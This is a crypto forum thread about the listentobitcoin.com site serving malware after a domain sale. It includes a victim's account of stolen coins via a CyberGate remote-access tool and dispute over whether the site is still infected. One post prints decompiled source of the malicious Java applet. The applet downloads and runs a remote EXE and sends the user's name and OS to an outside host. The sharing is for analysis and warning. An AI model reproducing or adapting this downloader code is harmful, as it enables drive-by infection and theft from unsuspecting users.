Author

Topic: Got this risk message, can someone elaborate on the listentobitcoin malware? (Read 3679 times)

sr. member
Activity: 336
Merit: 254
CEO of Privex Inc. (www.privex.io)
Hello... Anybody... Is it a threat to Apple Macs?

thx
The virus appears to download an EXE payload. Whether or not it has alternative payloads for Mac or Linux is unknown, but if you've visited the site and allowed the JAR to run, you may want to run some form of mac security program, as it's now detected by a good amount of antivirus programs.
sr. member
Activity: 336
Merit: 254
CEO of Privex Inc. (www.privex.io)
I decompiled their java file and it seems to be some kind-of download script. Here's malwarebytes post about it : http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/

Here's the source code decompiled for any security people
Code:
import java.applet.Applet;
import java.applet.AppletContext;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;

public class SecureJAR extends Applet
{
  public void init()
  {
    String str1 = System.getProperty("user.name");
    String str2 = System.getProperty("os.name");
    String str3 = System.getenv("temp");
    String str4 = "\\";
    String str5 = getParameter("rgsicvnjbn");
    String str6 = str4.concat(str5);
    String str7 = str3.concat(str6);
    Object localObject = getParameter("ioqujbjsyq");
    String str8 = "&yuvcpearce=";
    String str9 = getParameter("ivmbhojyjv");
    try
    {
      str2 = str2.replace(" ", "%20");
      str1 = str1.replace(" ", "%20");
      FileOutputStream localFileOutputStream = new FileOutputStream(str7);
      Runtime localRuntime = Runtime.getRuntime();
      URL localURL1 = new URL(getParameter("xmxdnhwphy"));
      URLConnection localURLConnection = localURL1.openConnection();
      InputStream localInputStream = localURLConnection.getInputStream();
      byte[] arrayOfByte = new byte[1024];
      int i;
      while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1)
        localFileOutputStream.write(arrayOfByte, 0, i);
      localInputStream.close();
      localFileOutputStream.close();
      localRuntime.exec(str7);
      localObject = new URL((String)localObject);
      getAppletContext().showDocument((URL)localObject);
      URL localURL2 = new URL("http://epickit.net/qsxnonlvrc.php?username=" + str9 + str8.replace("yuvcpearce", "evyaipgncs") + str2 + str8.replace("yuvcpearce", "piyhnvzbpw") + str1 + str8.replace("yuvcpearce", "tlbkqdpvxm") + "Traditional");
      localURL2.openStream();
    }
    catch (Exception localException)
    {
    }
  }
}
full member
Activity: 155
Merit: 100
Hello... Anybody... Is it a threat to Apple Macs?

thx
full member
Activity: 155
Merit: 100
Are Apple computers susceptible to the malware on listentobitcoins or only PCs? If one visited the site on an Apple is one at risk?
legendary
Activity: 1204
Merit: 1002
The malware seems to be back. At the end of "www.listentobitcoin.com" is this code:

Code:






This is appended to the end of the page, outside the tag. This looks like something a break-in attack appended automatically and blindly.
member
Activity: 97
Merit: 10
well for me it was to late i lost 0.47 btc and 15 ltc today because of this shit about 23 december i visited listentobitcoin.com and today i found out my cryptsy.com account was emptyed.

after searching i found in the java logs the answer that say's it all

    ]  ª   C! H  Ch9àÖ           B              C  Ø×                              C  Ø×                                   %http://listentobitcoin.info/sezam.exe   188.165.49.114     HTTP/1.1 200 OK content-length 502272
last-modified Fri, 20 Dec 2013 17:50:53 GMT expires Mon, 06 Jan 2014 15:44:16 GMT content-type application/octet-stream date Mon, 23 Dec 2013 15:44:16 GMT server nginx
cache-control max-age=1209600

sezam.exe create's a directory called /directory/cybergate/googleupdate.exe what allowed the hacker (lowlife scum) to access my laptop when i was away

i hopefully learned my lesson and using 2FA for now now i just need something to put back on my account Embarrassed

if you thief have a change of heart and want to sleep better @ night please return my btc to 192ou1R5P3MQNtFoYDh1SuEDjcbGMJYZtk
legendary
Activity: 1050
Merit: 1004
I said this below, but I want it to be a part of this post as well: I realize now that I made a very foolish mistake by selling the domain to someone untrustworthy, and I want to personally apologize to everyone who has been affected. I was too trusting, I made a huge mistake, and for what my words are worth, I promise that it won’t happen again.

~Maximillian Laumeister

http://bitcoinexaminer.org/listentobitcoin-com-was-infected-by-an-anonymous-buyer-says-founder-of-the-website/
legendary
Activity: 1134
Merit: 1118
Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.
I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware.

Interesting. I don't know how the domain might have been re-acquired, but it was throwing up malware.
legendary
Activity: 1204
Merit: 1002
Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.
I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware.  But I think there's a bug in Firefox's playing of audio files which results in choppy audio.  Both sites will produce choppy audio after they've been running for a while. Once this has happened, Firefox has to be restarted to fix the problem. This appears under both Windows 7 and Linux.
legendary
Activity: 1134
Merit: 1118
listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"

First, nice gravedig.
Second, you're a retard.
Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.

Finally, http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Please get your facts together before you try to spread FUD about something you know nothing about. Thanks.
legendary
Activity: 1862
Merit: 1011
Reverse engineer from time to time
listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"
Look at the date of the thread, please!
legendary
Activity: 1204
Merit: 1002
listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"
legendary
Activity: 1134
Merit: 1118
listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
full member
Activity: 220
Merit: 100
Hint: for the most part, Anti Virus software is mostly snake oil. especially Mcafee, Norton etc.
alp
full member
Activity: 284
Merit: 101
Make sure it's clear?  Reformat.
sr. member
Activity: 367
Merit: 250
Find me at Bitrated
FIRST PRIORITY, DO NOT GO TO LISTEN TO BITCOIN . COM

Saw this message come up from one of my AV recently. 

along with a reddit post from the creator, apologizing for what happened to the site:
http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Can anyone elaborate on what kind of malware exists or existed at this site?  I was browsing with chrome and unfortunately hadn't seen the post yet.  I visited listentobitcoin, but chrome didn't bring up any warning and I wasn't asked to install anything. 

I'm curious what steps I need to talk to make sure that my computer is clear
Jump to: